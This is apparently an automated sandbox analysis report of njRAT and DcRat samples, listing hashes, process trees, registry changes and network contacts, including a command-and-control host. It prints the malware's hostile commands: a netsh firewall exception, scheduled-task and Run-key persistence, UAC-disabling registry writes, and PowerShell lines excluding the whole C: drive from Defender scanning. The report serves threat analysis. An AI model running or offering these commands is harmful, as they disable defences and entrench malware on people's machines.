| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\tmpBBBE.tmp
| MD5 | 74462885d88a62da553d1f1ac504321a |
| SHA1 | e51b459fdffb9b36418af5199e7ad9049abdecd3 |
| SHA256 | 0c8200e36b80511ecfc6efa6f24d5fc8ed50c8732ec08c7645e1b92c8e32446b |
| SHA512 | 96b8323bfa2d0549c355f9edd81e89717a3cc3e14f47a40e7b4a20d509dd5b983a301d3845af770eae0450f9adf7af962180919ec365022558cec214b4df6040 |
memory/4844-21-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4844-20-0x0000000005360000-0x00000000053C6000-memory.dmp
memory/4844-19-0x00000000052B0000-0x00000000052D2000-memory.dmp
memory/4844-40-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/5788-44-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4580-47-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4844-45-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/4844-48-0x0000000006380000-0x000000000639E000-memory.dmp
memory/4844-49-0x0000000006410000-0x000000000645C000-memory.dmp
memory/4844-61-0x0000000006980000-0x000000000699E000-memory.dmp
memory/4844-51-0x0000000070F50000-0x0000000070F9C000-memory.dmp
memory/2140-63-0x0000000070F50000-0x0000000070F9C000-memory.dmp
memory/4844-62-0x0000000007570000-0x0000000007613000-memory.dmp
memory/4844-50-0x0000000006940000-0x0000000006972000-memory.dmp
memory/2140-74-0x0000000007600000-0x0000000007C7A000-memory.dmp
memory/4844-73-0x00000000076A0000-0x00000000076BA000-memory.dmp
memory/2140-75-0x0000000007030000-0x000000000703A000-memory.dmp
memory/2140-76-0x0000000007240000-0x00000000072D6000-memory.dmp
memory/2140-77-0x00000000071C0000-0x00000000071D1000-memory.dmp
memory/2140-79-0x0000000007200000-0x0000000007214000-memory.dmp
memory/4844-78-0x00000000078D0000-0x00000000078DE000-memory.dmp
memory/2140-80-0x0000000007300000-0x000000000731A000-memory.dmp
memory/4844-81-0x00000000079C0000-0x00000000079C8000-memory.dmp
memory/4844-85-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/2140-84-0x00000000748C0000-0x0000000075070000-memory.dmp
memory/5788-86-0x0000000006EA0000-0x0000000007062000-memory.dmp
memory/5788-87-0x0000000006D20000-0x0000000006D70000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250313-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\confuse = "C:\\Users\\Admin\\AppData\\Roaming\\confuse\\chargeable.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysMain = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1a9cd1714a3e518cfd51f84f1be819bf.exe" | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 976 set thread context of 5024 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
| PID 976 set thread context of 1088 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
| PID 976 set thread context of 3016 | N/A | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe
"C:\Users\Admin\AppData\Local\Temp\1a9cd1714a3e518cfd51f84f1be819bf.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
"C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe"
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3016 -ip 3016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 80
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 80
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe" "chargeable.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | doddyfire.linkpc.net | udp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
Files
memory/3344-0-0x00000000749D2000-0x00000000749D3000-memory.dmp
memory/3344-1-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-2-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-7-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-6-0x00000000749D2000-0x00000000749D3000-memory.dmp
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
| MD5 | 9c128ec6111b20f64d7dd0d7cbc1261f |
| SHA1 | e3572f7846f7411a5680677dc2dc065740874a39 |
| SHA256 | 2736418dd3b86592668eb3a2057b6cd4048739d23754a7519e394677ef955181 |
| SHA512 | 046e35d22185d04f4be1fe9f737c9d0c97073ba1f4cdbd092cda444cf1c166b41b62033e8fed7fc3b98901f73bcc1850b0d7957d5c848f8278cc066eb9d8c90c |
memory/976-22-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/976-21-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/976-20-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-19-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/5024-31-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/5024-33-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/976-32-0x00000000749D0000-0x0000000074F81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\chargeable.exe.log
| MD5 | 0a9b4592cd49c3c21f6767c2dabda92f |
| SHA1 | f534297527ae5ccc0ecb2221ddeb8e58daeb8b74 |
| SHA256 | c7effe9cb81a70d738dee863991afefab040290d4c4b78b4202383bcb9f88fcd |
| SHA512 | 6b878df474e5bbfb8e9e265f15a76560c2ef151dcebc6388c82d7f6f86ffaf83f5ade5a09f1842e493cb6c8fd63b0b88d088c728fd725f7139f965a5ee332307 |
memory/5024-23-0x0000000000400000-0x000000000040C000-memory.dmp
memory/5024-34-0x00000000749D0000-0x0000000074F81000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SchCache\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File created | C:\Windows\SchCache\9e8d7a4ca61bd9 | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RCX6C0E.tmp | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RCX6C8C.tmp | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe
"C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\root\Client\Registry.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\Client\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office\root\Client\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/7e20f84d5244aba7145631d4073af8/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/d25f591a00514bc9ba8441/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
